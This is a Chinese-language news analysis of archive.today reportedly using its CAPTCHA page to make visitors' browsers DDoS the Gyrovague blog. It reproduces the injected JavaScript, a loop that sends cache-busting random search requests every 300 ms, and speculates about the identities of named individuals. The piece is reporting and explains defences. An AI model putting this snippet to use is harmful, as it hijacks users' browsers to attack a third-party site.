Loading... # archive.today 利用用户浏览器发起 DDoS 攻击事件分析 # 一、新闻概述 ## 1. 标题 archive.today 利用用户浏览器对个人博客发起 DDoS 攻击 ## 2. 发布时间 2026 年 2 月 1 日 ## 3. 来源 Gyrovague 个人博客(gyrovague.com) # 二、核心内容 ## 1. 事件摘要 ### A. 主要内容 知名网页存档服务 archive.today 被曝利用访问其验证码(CAPTCHA)页面的用户浏览器,对 Gyrovague 博客发起分布式拒绝服务攻击。 ### B. 核心亮点 - archive.today 在验证码页面注入恶意 JavaScript 代码 - 每 300 毫秒向目标博客发起随机字符串搜索请求 - 阻止响应缓存,最大化资源消耗 - 事件源于一篇 2023 年发布的 archive.today 调查文章 ## 2. 关键信息 ### A. 攻击时间线 - 攻击开始时间:约 2026 年 1 月 11 日 - 首次公开发现:2026 年 1 月 14 日(Hacker News 用户 rabinovich) ### B. 涉及技术 - JavaScript 定时器(setInterval) - Fetch API - CORS no-cors 模式 - Referrer 策略隐藏 ### C. 攻击目标 - 目标网站:Gyrovague(gyrovague.com) - 攻击向量:随机字符串搜索请求 - 资源消耗:服务器 CPU 和带宽 ## 3. 背景介绍 ### A. 前置事件 2023 年 8 月 5 日,Gyrovague 发布了一篇题为《archive.today:追踪互联网神秘的游击队档案员》的调查文章,使用 OSINT 技术分析了该网站的历史、技术栈和资金来源,并提及三个与网站相关的化名。 ### B. 相关上下文 - 2025 年 11 月:FBI 传唤 archive.today 的域名注册商 Tucows - 2026 年 1 月:有人以 GDPR 投诉尝试要求删除该文章 - 2026 年 1 月:archive.today 网站管理员邮件要求暂时删除文章 # 三、详细报道 ## 1. 攻击技术分析 ### A. 恶意代码分析 archive.today 在其验证码页面注入以下 JavaScript 代码: ```javascript setInterval(function() { fetch("https://gyrovague.com/?s=" + Math.random().toString(36).substring(2, 3 + Math.random() * 8), { referrerPolicy: "no-referrer", mode: "no-cors" }); }, 300); ``` **代码功能解析**: - 使用 setInterval 每 300 毫秒执行一次请求 - 生成随机字符串作为搜索参数(防止缓存) - 使用 no-cors 模式绕过跨域限制 - 使用 no-referrer 策略隐藏来源 ### B. 攻击原理 ```mermaid graph LR A[用户访问 archive.today] --> B[重定向到 CAPTCHA 页面] B --> C[加载恶意 JavaScript] C --> D[每 300ms 发起请求] D --> E[Gyrovague.com 服务器] E --> F[生成随机搜索 URL] F --> E E --> G[服务器资源消耗] ```  ### C. 防御措施 - uBlock Origin 等广告拦截器可阻止请求执行 - 2026 年 1 月 21 日,gyrovague.com 被添加到 DNS 阻止列表 ## 2. 事件时间线 ### A. 时间线概览 | 时间 | 事件 | |------|------| | 2023-08-05 | 发布 archive.today 调查文章 | | 2025-11-05 | Heise Online 报道 FBI 调查 archive.today | | 2025-11-13 | AdGuard DNS 披露 WAAD 组织施压事件 | | 2026-01-08 | 收到 GDPR 投诉(Nora Puchreiner) | | 2026-01-10 | archive.today 管理员邮件要求删除文章 | | 2026-01-11 | DDoS 攻击开始(推测时间) | | 2026-01-14 | Hacker News 用户首次公开发现攻击 | | 2026-01-21 | gyrovague.com 被添加到 DNS 阻止列表 | | 2026-01-25 | archive.today 方面发出威胁邮件 | ### B. 关键事件详解 **GDPR 投诉事件**: - 投诉人:Nora Puchreiner - 投诉内容:文章包含大量个人数据,语调和语境具有诽谤性质 - 处理结果:Automattic(WordPress.com)支持文章作者,拒绝删除 **邮件沟通记录**: - archive.today 管理员要求暂时删除文章数月 - 作者提议修改部分措辞,拒绝完全删除 - 后续邮件演变为威胁,包括人身攻击 ## 3. 身份迷雾 ### A. 相关身份 **Nora Puchreiner**: - 发送 GDPR 投诉的联系人 - 在 Hacker News 上评论过原始文章 - 拥有俄罗斯 LiveJournal 账户,发布过反盗版组织相关内容 - 曾在 KrebsonSecurity 网站上有争议性言论 **rabinovich**: - 在 Hacker News 上首次公开 DDoS 攻击 - 提交过竞争性存档网站 Ghostarchive - 匹配与 archive.today 相关的 Masha Rabinovich 姓名 **Richard Président**: - 来自 WAAD(Web Abuse Association Defense)组织 - 主动提供 GDPR 反投诉帮助 - 试图进行身份验证 ### B. 组织背景 **WAAD(Web Abuse Association Defense)**: - 一家法国组织 - 曾向 AdGuard DNS 施压要求屏蔽 archive.today 域名 - 被指控冒充他人 ## 4. 技术细节 ### A. 攻击影响评估 **资源消耗**: - 每个用户每秒发起约 3.3 次请求 - 假设 1000 个用户访问验证码页面,每秒约 3300 次请求 - 随机参数确保响应无法被 CDN 缓存 **实际影响**: - 目标网站使用固定费率托管计划 - 实际经济损失为零 - 主要影响为服务器资源消耗 ### B. 攻击动机分析 根据 Mastodon 上的对话记录,archive.today 管理员声称攻击目的是: - 吸引注意力 - 增加目标网站的托管费用 作者认为这可能是一种误导性的自我防御方式,反映出调查压力对网站管理员的影响。 # 四、影响分析 ## 1. 行业影响 ### A. 网页存档服务信任危机 - archive.today 作为知名存档服务,此次行为引发对其道德立场的质疑 - 用户开始担心访问存档网站时自身的安全性 ### B. 隐私与安全关注 - 验证码页面通常被视为安全区域,此次事件打破了这种信任 - 用户浏览器被滥用发动攻击,侵犯了用户自主权 ## 2. 技术趋势 ### A. 浏览器安全防护 - 广告拦截器在此事件中发挥了保护作用 - 提醒用户安装浏览器安全扩展的重要性 ### B. 网络取证技术 - 事件展示了如何通过网络请求分析发现恶意行为 - Hacker News 社区在事件曝光中发挥了重要作用 ## 3. 法律与伦理 ### A. GDPR 滥用问题 - GDPR 被用作审查已发布信息的工具 - 新闻自由与隐私保护之间的平衡问题 ### B. 网络攻击责任 - 利用用户浏览器发动攻击的法律责任归属问题 - 网站管理员对其托管内容的控制权边界 # 五、各方反应 ## 1. 业内评价 ### A. Hacker News 社区 - 用户 rabinovich 首次发现并公开攻击行为 - 社区对 archive.today 的行为表示谴责 - 讨论了网页存档服务的重要性和透明度问题 ### B. 技术社区 - AdGuard DNS 披露了相关组织的施压行为 - DNS 阻止列表快速响应,将目标网站添加至保护列表 ## 2. 用户反馈 ### A. 正面评价 - 赞赏作者坚持不删除文章的立场 - 支持对存档服务的透明度调查 ### B. 负面评价 - 部分用户认为调查文章损害了存档服务的可用性 - 有人认为攻击是对作者调查行为的"报复" ### C. 中立观察 - 事件凸显了网络信息存档的复杂性和敏感性 - 呼吁存档服务提高透明度和问责制 # 六、相关链接 ## 1. 官方公告 - Gyrovague 博客原文:archive.today is directing a DDOS attack against my blog ## 2. 相关报道 - Heise Online:Archive.today FBI Demands Data from Provider Tucows - ArsTechnica:FBI subpoena tries to unmask mysterious founder of archive.today - AdGuard DNS Blog:archive.today AdGuard DNS block demand ## 3. 技术文档 - Hacker News 讨论:Ask HN: Weird archive.today behavior? - 原始调查文章:archive.today: On the trail of the mysterious guerrilla archivist of the Internet ## 4. 技术资源 - DNS 阻止列表:hagezi/dns-blocklists - 邮件记录副本:lightly redacted copy of the entire email thread *** ## 参考资料 1. [archive.today is directing a DDOS attack against my blog - Gyrovague](https://gyrovague.com/2026/02/01/archive-today-is-directing-a-ddos-attack-against-my-blog/) 最后修改:2026 年 02 月 03 日 © 允许规范转载 赞 如果觉得我的文章对你有用,请随意赞赏